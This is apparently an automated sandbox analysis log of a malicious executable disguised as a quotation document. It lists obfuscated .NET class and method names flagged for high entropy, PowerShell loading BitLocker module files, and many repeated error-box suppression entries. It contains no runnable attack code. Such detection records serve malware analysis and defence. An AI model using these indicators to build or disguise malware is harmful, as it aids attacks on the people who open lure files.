Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, p03faqTuYnEPlJZiok.cs	High entropy of concatenated method names: 'vItcaPyZkt', 'Xgqcjv1NHE', 'myqcOulqqX', 'Q7TciLYjmS', 'lHOcSRfKnO', 'wtYcUrng35', 'x6Qc88AfBT', 'OGxcBYf8Et', 'aRlc52yj93', 'yaNcp7IKWL'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, Vdw1AcomMVLhZBKWm6A.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Pfx2qhsC5q', 'E0b2toZnwp', 'iHS2PfMZAh', 'i5D2VPW3WA', 'NJR2bMdIrM', 'Ew42GHh4uQ', 'CsT2rioSJp'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, AW1XAid6aaFEALqkNw.cs	High entropy of concatenated method names: 'eNTKeDZMIC', 'V9sK3JbkDr', 'dkhnOpqR7f', 'moZnicU5pi', 'UmnnS5e9EY', 'U8JnUBdnLk', 'tqAn8dQK2o', 'wZonB6wM2v', 'A4Hn5Ch3XR', 'rDmnpH5EGB'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, UASvVPooGqQL4Q4rGLd.cs	High entropy of concatenated method names: 'pAV2QvC61p', 'gI62ztY0uF', 'FP3hmto0ac', 'vgKho3pgcB', 'EgOh4dM71b', 'zL6hChOZER', 'zFmhwsxevi', 'tBPhYnKHeU', 'p3ah1jPmgl', 'K4YhkQlUCu'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, URohiCyOhyISdTIdfl.cs	High entropy of concatenated method names: 'QxLkV1M92X', 'aj9kbNaA6P', 'n0mkGybDTA', 'uCokrUe06E', 'QXVk7wNifO', 'qjKkl4NBu7', 'bKfkx7QEKF', 'm7Mk6ijxEv', 'tM0kTQMdmA', 'JVekQWmR9v'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, RZvZycl1IErFJBwh51.cs	High entropy of concatenated method names: 'nOtZ6Mc54G', 'OojZQ3YG9s', 'QeDDmHr6bo', 't5ODoFvtqs', 'XtQZqqfPbH', 'xIhZtje5XM', 'T3EZPmF3TK', 'zMDZVx6mW7', 'yPeZb8MOZ4', 'RO9ZGYdrTX'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, apwZEaowF7n4t7cx2tb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gqjHc96Y5C', 'bRvH22UmX5', 'RbjHhlOTbg', 'EPkHH6Z6p2', 'Iu0HNJSsuU', 'FTPHJ5ltua', 'EPyH9jYUGE'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, tsXAIV5gSxSumB0eV6.cs	High entropy of concatenated method names: 'TG2MWIkmrr', 'RgZMsxGZky', 'gGZMIoccp6', 'juOMvN1GbO', 'oRXMe473Mr', 'TenM0AHlHe', 'PLqM33bmOK', 'fnBMySSGYw', 'SjPMA687g3', 'bjyMdgF3xk'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, NJJ9B4kmEBR80V6h7i.cs	High entropy of concatenated method names: 'Dispose', 'IqQoTsssI0', 'YUE4jvjc1W', 'OQTPBIP0gf', 'cJpoQxrVBx', 'IJHozwFEjS', 'ProcessDialogKey', 't7Z4m03faq', 'nYn4oEPlJZ', 'Iok44vU3iT'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, N4VkTfo42y3TjPxU8K9.cs	High entropy of concatenated method names: 'ToString', 'wD4hysNOsi', 'ErwhAnAtsT', 'EWlhdxFm4s', 'V9hhaS8C6I', 'ghohj2SIv3', 'u7ChOHFhZL', 'TMBhidgaDL', 'LN289m5zUJDZFGHMVqe', 'eNROcXm0QmnZfaZkc2n'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, PRg8tUaVqJkrx61KIB.cs	High entropy of concatenated method names: 'NxiXYbxgCO', 'J2nXkTpDy3', 'YfJXKk51o0', 'zVOXMqHF5n', 'UVHXE8oulm', 'k7cK7Efk88', 'urZKlr2fZC', 'tVMKx71CbZ', 'CslK6l4wiR', 'k2fKTGTQld'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, AU3iTZQIBZyngZ0qET.cs	High entropy of concatenated method names: 'u4T2n7ydNi', 'hI52KKpVuV', 'iov2Xf0nVI', 'mhI2M8H7sP', 'VLN2c2vxrA', 'yt22EfVXQV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, MAbVBc4F6MrgDAKM0N.cs	High entropy of concatenated method names: 'JiBIIJlys', 'iHxvLIFoI', 'lVl0hkvjp', 'wIO3VHJ5n', 'JmdAg8Ng5', 'LhldIFfbD', 'PON5ug28fnjVPm79UT', 'UrEjPrp0MK1dq0ikH2', 'fEVDRcT5C', 'gDX20dBWo'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, wd4x5TP1uWTaYwrBhp.cs	High entropy of concatenated method names: 'g0FLyOZRTH', 'NXVLAEVqfe', 'DO8LaS4ej4', 'qeWLjexLUI', 'kb6LimH5eV', 'zbILS328pU', 'MRnL8CAXCJ', 'AgOLBxin8c', 'olLLpsAT8P', 'xi1LqVAtND'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	High entropy of concatenated method names: 'gxPCYpxxTN', 'zjVC1x7A1i', 'UoWCkiQwhf', 'h3oCnh9nq5', 'Fq9CKC5WuS', 'E98CX33Ivk', 'Oy4CM9q0QQ', 'ej0CEbEZ6t', 'v39CR1JK5H', 'cdGCfpwjGP'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, TppGZB88OZEPeXtmUZ.cs	High entropy of concatenated method names: 'arUM1fDIgw', 'tQcMnOb04E', 'nCFMXnxoKp', 'mGVXQ0GeQ0', 'CRpXz4gHkk', 'x2PMmErN97', 'fEGMo1unEq', 'sleM4qJou6', 'w15MCm0WM1', 'TRcMwtN25E'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, CHOZhcxrBiqQsssI0C.cs	High entropy of concatenated method names: 'tlFcgumQKE', 'fTIcZXtALV', 'vkNccl9Bks', 'UPqchaCZ4w', 'rg1cNGBRRe', 'HYvc9R1DbR', 'Dispose', 'luPD1LnLTl', 'qssDkqjxuc', 'T9HDnch6NB'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, toXJJTzjOen8LC7uM1.cs	High entropy of concatenated method names: 'bVN20ynGuF', 'rPo2yOy00q', 'h8D2A9wnXD', 'E7q2alOTfx', 'gqc2jYJMEi', 'xiy2iyHTgY', 'ryy2SMiDcm', 'FrR29YZ8J2', 'xAk2Wr3XMf', 'si42sgZSfY'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, cCoFjEAPSPckWGQMTF.cs	High entropy of concatenated method names: 'Mw0nvMul4X', 'DaJn0L6uQP', 'g2DnyriU2g', 'VEenARn06R', 'hUtngm6KZP', 'GPHnFhGCBU', 'mdUnZmQnew', 'Sv8nD6Y6xP', 'LFYncRTfn9', 'nbqn21mSMj'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, vBDl25ruLQYGqjRNv9.cs	High entropy of concatenated method names: 'rcpZfBQnvU', 'cwaZuHJoX2', 'ToString', 'eNfZ1m3YqL', 'w0GZkmLYYS', 'XvPZn7icEZ', 'KTHZKL6TdH', 'c7DZX9HK1C', 'ejMZMxSYZ4', 'qavZE7hpjM'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, zjJkSEwok5ev54wghk.cs	High entropy of concatenated method names: 'p67oMRohiC', 'HhyoEISdTI', 'kPSofPckWG', 'YMTouFvW1X', 'oqkogNwPRg', 'LtUoFVqJkr', 'xGlyvtjmkZlErAU0AP', 'caHpNJUPp90TymDG4X', 'USFooEC6BK', 'i2noCxTY4G'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, p03faqTuYnEPlJZiok.cs	High entropy of concatenated method names: 'vItcaPyZkt', 'Xgqcjv1NHE', 'myqcOulqqX', 'Q7TciLYjmS', 'lHOcSRfKnO', 'wtYcUrng35', 'x6Qc88AfBT', 'OGxcBYf8Et', 'aRlc52yj93', 'yaNcp7IKWL'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, Vdw1AcomMVLhZBKWm6A.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Pfx2qhsC5q', 'E0b2toZnwp', 'iHS2PfMZAh', 'i5D2VPW3WA', 'NJR2bMdIrM', 'Ew42GHh4uQ', 'CsT2rioSJp'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, AW1XAid6aaFEALqkNw.cs	High entropy of concatenated method names: 'eNTKeDZMIC', 'V9sK3JbkDr', 'dkhnOpqR7f', 'moZnicU5pi', 'UmnnS5e9EY', 'U8JnUBdnLk', 'tqAn8dQK2o', 'wZonB6wM2v', 'A4Hn5Ch3XR', 'rDmnpH5EGB'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, UASvVPooGqQL4Q4rGLd.cs	High entropy of concatenated method names: 'pAV2QvC61p', 'gI62ztY0uF', 'FP3hmto0ac', 'vgKho3pgcB', 'EgOh4dM71b', 'zL6hChOZER', 'zFmhwsxevi', 'tBPhYnKHeU', 'p3ah1jPmgl', 'K4YhkQlUCu'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, URohiCyOhyISdTIdfl.cs	High entropy of concatenated method names: 'QxLkV1M92X', 'aj9kbNaA6P', 'n0mkGybDTA', 'uCokrUe06E', 'QXVk7wNifO', 'qjKkl4NBu7', 'bKfkx7QEKF', 'm7Mk6ijxEv', 'tM0kTQMdmA', 'JVekQWmR9v'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, RZvZycl1IErFJBwh51.cs	High entropy of concatenated method names: 'nOtZ6Mc54G', 'OojZQ3YG9s', 'QeDDmHr6bo', 't5ODoFvtqs', 'XtQZqqfPbH', 'xIhZtje5XM', 'T3EZPmF3TK', 'zMDZVx6mW7', 'yPeZb8MOZ4', 'RO9ZGYdrTX'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, apwZEaowF7n4t7cx2tb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gqjHc96Y5C', 'bRvH22UmX5', 'RbjHhlOTbg', 'EPkHH6Z6p2', 'Iu0HNJSsuU', 'FTPHJ5ltua', 'EPyH9jYUGE'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, tsXAIV5gSxSumB0eV6.cs	High entropy of concatenated method names: 'TG2MWIkmrr', 'RgZMsxGZky', 'gGZMIoccp6', 'juOMvN1GbO', 'oRXMe473Mr', 'TenM0AHlHe', 'PLqM33bmOK', 'fnBMySSGYw', 'SjPMA687g3', 'bjyMdgF3xk'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, NJJ9B4kmEBR80V6h7i.cs	High entropy of concatenated method names: 'Dispose', 'IqQoTsssI0', 'YUE4jvjc1W', 'OQTPBIP0gf', 'cJpoQxrVBx', 'IJHozwFEjS', 'ProcessDialogKey', 't7Z4m03faq', 'nYn4oEPlJZ', 'Iok44vU3iT'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, N4VkTfo42y3TjPxU8K9.cs	High entropy of concatenated method names: 'ToString', 'wD4hysNOsi', 'ErwhAnAtsT', 'EWlhdxFm4s', 'V9hhaS8C6I', 'ghohj2SIv3', 'u7ChOHFhZL', 'TMBhidgaDL', 'LN289m5zUJDZFGHMVqe', 'eNROcXm0QmnZfaZkc2n'

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
